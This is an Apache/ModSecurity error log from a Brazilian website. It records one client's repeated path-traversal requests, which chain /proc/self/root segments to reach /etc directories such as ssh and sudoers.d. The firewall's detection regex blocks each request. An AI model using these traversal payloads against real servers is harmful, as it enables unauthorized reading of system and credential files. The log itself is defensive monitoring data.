[Tue Mar 17 20:56:57.186481 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:58814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqSfPqhzTj3BvfDX-vpAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:56:58.443426 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:49904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqSoh-PF_25v4hFRCRtQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:59.944338 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:49918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqSxj0p0SRWAqcjGGgpwAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:57:01.446350 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:49930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqTYh-PF_25v4hFRCRtgAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:14.127103 2026] [proxy_fcgi:error] [pid 6296:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48658] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:57:16.189864 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.241.31:60252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqXBj0p0SRWAqcjGGgsQAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:17.623557 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:44314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqXda6ubjKNq_cu4YtgwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:19.058050 2026] [:error] [pid 11088:tid 140411666392832] [client 74.7.241.31:44322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqX2mqtCojLHvu5cKPzwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:20.491229 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:44326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqYNY0UrI5A3LftIwmRQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:23.019489 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:44340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqYdY0UrI5A3LftIwmRwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:25.050575 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:44346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqZdY0UrI5A3LftIwmSgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:36.125847 2026] [proxy_fcgi:error] [pid 25836:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49048] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:57:38.118359 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:51130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqcsdf6f5d65gmYZRjYgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:42.685755 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:51136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqdoh-PF_25v4hFRCRwQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:45.535447 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:51148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqeew_le52K8_3pV1zqgAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:47.744731 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.241.31:52184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqexj0p0SRWAqcjGGgtgAAAwk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:57:58.085870 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49496] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:58:00.823572 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:40550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqiOw_le52K8_3pV1zrgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:03.893514 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:40560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqi8df6f5d65gmYZRjcAAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:07.009780 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:40564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqjsdf6f5d65gmYZRjcgAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:12.429920 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:48158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqlNa6ubjKNq_cu4YtlwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:58:18.645581 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:51120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqmda6ubjKNq_cu4YtmQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:19.339966 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.244.43:52968] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnqm8df6f5d65gmYZRjdAAAAsU"]
[Tue Mar 17 20:58:20.130279 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:58:20.193431 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:51122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqnOyqAr6etmhZHNpNvgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:22.509396 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:51130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqnhj0p0SRWAqcjGGgvwAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:22.621021 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.228.61:49518] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnqnhj0p0SRWAqcjGGgwAAAAxY"]
